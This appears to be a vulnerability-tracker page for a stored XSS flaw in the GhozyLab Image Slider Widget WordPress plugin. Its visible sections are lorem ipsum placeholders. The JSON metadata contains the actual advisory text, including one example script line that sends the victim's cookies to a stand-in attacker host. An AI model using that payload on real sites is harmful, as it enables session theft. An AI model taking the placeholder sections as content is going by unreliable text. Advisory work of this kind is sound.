Sceawere
Vulnerability Detail
CVE-2026-42700UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV
Stored XSS in Image Slider
Vulnerability Metadata
- Severity
- Medium
- Score / CVSS
- 6.5
- Creation Date
- 3h ago
- Vendor
- GhozyLab
- Product
- Image Slider Widget
- Attack Type
- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- Vector String
- CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
- Attack Complexity
- LOW
Narrative and Response
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GhozyLab Image Slider Widget image-slider-widget allows Stored XSS.This issue affects Image Slider Widget: from n/a through 1.1.130.
Executive Summary
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Technical Details
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Mitigations
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
References
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Additional Metadata
{
"score": "6.5",
"pubDate": "2026-10-05T18:17:36.940Z",
"pubdate": "2026-10-05T18:17:36.940Z",
"executiveSummary": "The Image Slider Widget plugin for WordPress is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation. This flaw allows an authenticated attacker to inject malicious scripts into the application, which are then persisted in the database and executed within the context of other users' browsers, including those with administrative privileges.\nThe vulnerability affects all versions of the Image Slider Widget from inception up to and including version 1.1.130. By successfully exploiting this flaw, an attacker could achieve unauthorized access to sensitive information, session hijacking, or perform actions on behalf of the victim. The risk is considered significant as it impacts data integrity and user session security within the affected WordPress environment. Exploitation typically requires the attacker to possess sufficient privileges to interact with the plugin's administrative interface to inject the payload.",
"technicalDetails": "The vulnerability is categorized as CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). The root cause lies in the plugin's failure to adequately sanitize and validate input parameters before persisting them to the database and rendering them on the front-end or back-end interface.\nIn the context of the Image Slider Widget, user-controlled input fields—likely related to slider configurations, slide titles, or custom attributes—are not subjected to rigorous output encoding or input validation. When an attacker supplies a specially crafted payload containing malicious JavaScript, the plugin stores this string directly into the database. When the widget component is rendered on a page, the unsanitized payload is interpreted by the victim's browser as active content.\nThe attack flow proceeds as follows: First, an attacker with appropriate privileges navigates to the plugin's configuration or slide creation interface. Second, the attacker inputs a malicious JavaScript payload (e.g., <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>) into an input field that the plugin processes. Third, the application saves this input to the database without stripping or encoding HTML special characters. Finally, when any user—such as an administrator or a visitor—views the affected slide or the administrative page where the data is displayed, the browser executes the injected script.\nThis Stored XSS attack is particularly dangerous because the malicious payload is stored permanently on the server. Unlike Reflected XSS, the victim does not need to click a crafted link; they only need to browse to the page containing the malicious content. Upon execution, the payload operates within the origin of the vulnerable site, granting the attacker access to the document object model (DOM), allowing for the theft of session cookies, sensitive data exfiltration, or the redirection of users to malicious domains. Given the version range of 1.1.130 and below, all deployments are currently at risk. Exploitation is facilitated by the lack of context-aware output encoding across the plugin's rendering functions, which allows the injection of arbitrary HTML/JavaScript into the DOM."
}